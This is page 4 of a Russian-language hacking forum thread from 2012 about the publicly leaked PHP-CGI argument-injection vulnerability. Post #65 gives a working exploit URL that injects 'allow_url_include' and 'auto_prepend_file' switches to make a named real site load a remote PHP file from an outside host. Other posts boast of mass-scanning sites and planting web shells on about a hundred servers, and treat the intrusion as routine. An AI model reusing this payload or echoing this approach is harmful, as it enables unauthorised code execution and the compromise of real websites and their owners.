Критическая уязвимость PHP случайно опубликована в открытом доступе

Discussion in 'Мировые новости. Обсуждения.' started by d3l3t3, 5 May 2012.

Page 4 of 5
  1. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    еб... работает, нихуасе
     
    #61 cylaaaan, 7 May 2012
  2. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    91
    Likes Received:
    66
    Reputations:
    48
    Все главные уязвимые сервер сейчас под ошибкой 500, это кто ж такой кривой мля.
    Или это кто то специально положил ...
     
    #62 FlooP1k, 8 May 2012
  3. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    Ага, и багу залатали!
     
    #63 cat1vo, 8 May 2012
  4. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Одно дело посмотреть сорцы функц\модуля другое весь движок мозг выкипит.
     
    #64 mironich, 8 May 2012
  5. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    rekonn.ru/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://boards.dishretailer.com/customavatars/404.php
    что то не то)
     
    #65 alextrust, 8 May 2012
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859
    Пипец. Поздравляю, товарисчи. Наиболее популярные хостеры с сегодняшнего дня залатали дыру.

    Называется кто успел тот и съел.

    Из 1к свежих насканенных - пробив около 10% всего ((

    Масс хек не получится.

    З.Ы. Хорошо что вчера допоздна шеллы лил.
     
    _________________________
    #66 BigBear, 8 May 2012
  7. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    BigBear
    а что ты хотел?
    уязвимость в паблке)
     
    #67 alextrust, 8 May 2012
  8. [ Dumi ]

    [ Dumi ] Member

    Joined:
    27 May 2009
    Messages:
    21
    Likes Received:
    65
    Reputations:
    13
    второй год в паблике вроде как
     
    #68 [ Dumi ], 8 May 2012
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    Пруфлинк в студию!
     
    #69 cat1vo, 8 May 2012
  10. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    937
    Likes Received:
    162
    Reputations:
    27
    За тобой уже выехали.
     
    #70 Chrome~, 8 May 2012
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    А у каких были?
     
    #71 попугай, 8 May 2012
  12. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42
    РБК
     
    #72 .Varius, 8 May 2012
  13. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    хи, я листал сайты ЯК в поисках уязвимых, и как раз перед рбк почему то приостановился и потом перешел в другую категорию(
     
    #73 BLurpi^_^, 9 May 2012
  14. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Наконец нашел время написать сканер. Сканил на наличие
    PHP:
    <?(php){0,1}
    Из 2000 проверенных сайтов ни одного уязвимого.

    Один только facebook.com/ :D
     
    #74 tmp, 9 May 2012
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    у них же fastcgi вроде
     
    #75 попугай, 9 May 2012
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859

    Уязвимых сайтов все ещё дохрена. Тока с утра залился где-то на 100 ку сайтов.

    Фишка в том, что некоторые хостеры позволяют залить шелл тока через видоизменённый запрос.
     
    _________________________
    #76 BigBear, 9 May 2012
  17. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    91
    Likes Received:
    66
    Reputations:
    48
    вот только "ляпнуть" ...
     
    #77 FlooP1k, 9 May 2012
  18. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    А ведь фейсбук какгбэ намекает ))
     
    #78 DeepBlue7, 9 May 2012
  19. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Я так и не понял,че она вдруг актуальной стала ? Ну,бага была известна,так че,никто не обратил внимание на неё ? Бред какой-то.

    хех,не знал,что фейс на фреймворке:

    PHP:
    <?php include_once 'https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS';
    Или это баг какой-то,что закрывающего тега нет ?

    А теперь по теме - неужели вам так впадлу поставить php-cgi на апаче?
     
    #79 Breetonia, 9 May 2012
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Lol, на фейсбуке вовсе не бага. Таким образом они ищут себе специалистов.
     
    #80 ZARO, 9 May 2012
(You must log in or sign up to post here.)
Page 4 of 5